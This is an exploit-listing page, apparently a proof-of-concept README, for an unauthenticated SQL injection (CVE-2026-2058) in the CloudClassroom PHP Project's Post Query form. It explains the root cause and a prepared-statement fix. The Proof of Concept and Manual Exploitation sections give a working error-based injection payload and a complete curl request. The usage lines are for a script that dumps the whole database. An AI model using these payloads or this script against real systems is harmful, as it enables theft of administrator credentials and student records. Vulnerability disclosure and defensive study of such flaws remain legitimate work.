## https://sploitus.com/exploit?id=30AE935E-B79B-5845-91E9-4A5C2A3869CB
# CVE-2026-2058-PoC โ CloudClassroom PHP Project SQL Injection
## Overview
A **SQL Injection vulnerability** exists in the **Post Query functionality** of the *CloudClassroom PHP Project (v1.0)*.
The vulnerability allows attackers to inject arbitrary SQL commands via the **`squeryx` POST parameter**, leading to **database enumeration and data extraction**.
This repository contains a **Proof of Concept (PoC) exploit** demonstrating how the vulnerability can be abused to extract sensitive data from the backend database.
---
## Vulnerability Information
| Field | Value |
| ----------------------- | -------------------------- |
| CVE | CVE-2026-2058 |
| Vulnerability Type | SQL Injection |
| CWE | CWE-89 |
| Affected Software | CloudClassroom PHP Project |
| Affected Version | 1.0 |
| Component | Post Query functionality |
| Attack Vector | Remote |
| Authentication Required | No |
| Impact | Database disclosure |
| Severity | High |
---
## Vulnerable Endpoint
```
POST /postquerypublic
```
### Vulnerable Parameter
```
squeryx
```
---
## Root Cause
The backend code directly concatenates user input into a SQL query without proper sanitization or parameterized queries.
Example vulnerable code:
```php
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
```
Because `$tempsquery` is derived from user input, attackers can inject arbitrary SQL.
---
## Proof of Concept
The vulnerability can be triggered using an **error-based SQL injection** technique leveraging the MySQL `updatexml()` function.
Example payload:
```
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
```
---
## Manual Exploitation
Example `curl` request:
```bash
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "email=test@test.com" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
```
Expected response:
```
XPATH syntax error: '~cc_db~'
```
---
## Exploit Script
This repository includes a bash exploit that automatically:
* Extracts the **database name**
* Enumerates **tables**
* Enumerates **columns**
* Dumps **table data**
### Usage
```
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
```
Example:
```
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
```
---
## Impact
An attacker can:
* Enumerate database structure
* Extract sensitive data
* Retrieve administrator credentials
* Access student records
* Fully compromise the backend database
---
## Mitigation
Developers should:
* Use **prepared statements**
* Implement **input validation**
* Escape user input properly
* Apply **least privilege database permissions**
Example secure implementation:
```php
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();
```
---
## References
* https://cwe.mitre.org/data/definitions/89.html
* https://owasp.org/www-community/attacks/SQL_Injection
* https://owasp.org/www-project-top-ten/
---
## Disclaimer
This exploit is provided for **educational and research purposes only**.
The author is **not responsible for misuse or damage caused by this code**.
---
## Author
**bl4dsc4n**
Security Researcher